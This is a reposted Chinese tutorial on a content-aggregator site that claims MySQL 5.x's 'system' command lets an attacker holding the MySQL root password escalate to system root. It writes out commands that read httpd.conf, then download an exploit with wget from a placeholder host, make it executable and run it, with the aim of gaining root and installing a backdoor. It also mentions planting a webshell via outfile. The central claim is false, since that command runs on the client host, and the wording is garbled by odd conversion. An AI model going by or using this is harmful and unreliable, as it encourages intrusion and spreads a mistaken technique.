当前位置:七道奇文章资讯系统安全Linux安全
日期:2011-11-06 16:33:00  来源:本站整理

<b>linux系统的最新提权本领</b>[Linux安全]

赞助商链接



  本文“<b>linux系统的最新提权本领</b>[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

mysql5.x for linux下面有一个函数,可以帮忙我们干很多事情,这个函数4.x下面目似没,本来一向没发现,也没去查函数手册,就我自己的经验来写点东西.4,x的 明天再看看函数手册,再装一个实行一下.

 
  mysql 5.x里面引入了一个system函数,这个函数可以履行系统号令,当mysql以root登陆的时刻,便可以操纵这个函数履行号令,当然是在权限答应的 范围内.
 
  普通我们按照通例思绪,搞到mysql的root密码之后,我们城市衔接上去,成立一个表,然后outfile,搞到一个webshell ,然后提权如此这般.本日我们换一种方法.
 
  按照上面的办法,我们需求知道web的绝对途径,当然这个很不好找,有些有sqlinjection的,大概报错会显示出来,有的就不一定了.但是 按照我的的办法,没有必要再去找web途径了,直接履行
 
  mysql>system vi /etc/httpd/conf/httpd.conf;
 
  直接这样便可以找到web的途径,当然,我们的目的并非找web途径,放webshell进去.我们是要来做其他的事情,比方,下载exp履行, 搞到 root权限,然后装后门虾米的
 
  mysql>system wget http://xxxx.xxx.com/xxxx ; mysql>system chmod +x xxxx; mysql>system ./xxxx;
 
  这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定.   以上是“<b>linux系统的最新提权本领</b>[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • <b>hosts是什么 hosts文件在什么位置 若何改正hosts</b>
  • <b>在 Windows 8 中手动安装语言包</b>
  • <b>五个常见 PHP数据库问题</b>
  • Windows中Alt键的12个高效快速的利用本领介绍
  • <b>MySQL ORDER BY 的实现解析</b>
  • <b>详解MySQL存储历程参数有三种范例(in、out、inout)</b>
  • <b>Win8系统恢复出来经典的开始菜单的办法</b>
  • <b>Win8系统花屏怎么办 Win8系统花屏的办理办法</b>
  • <b>Windows 7系统下无线网卡安装</b>
  • <b>为什么 Linux不需求碎片整理</b>
  • <b>Windows 8中删除账户的几种办法(图)</b>
  • <b>教你如安在win7下配置路由器</b>
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .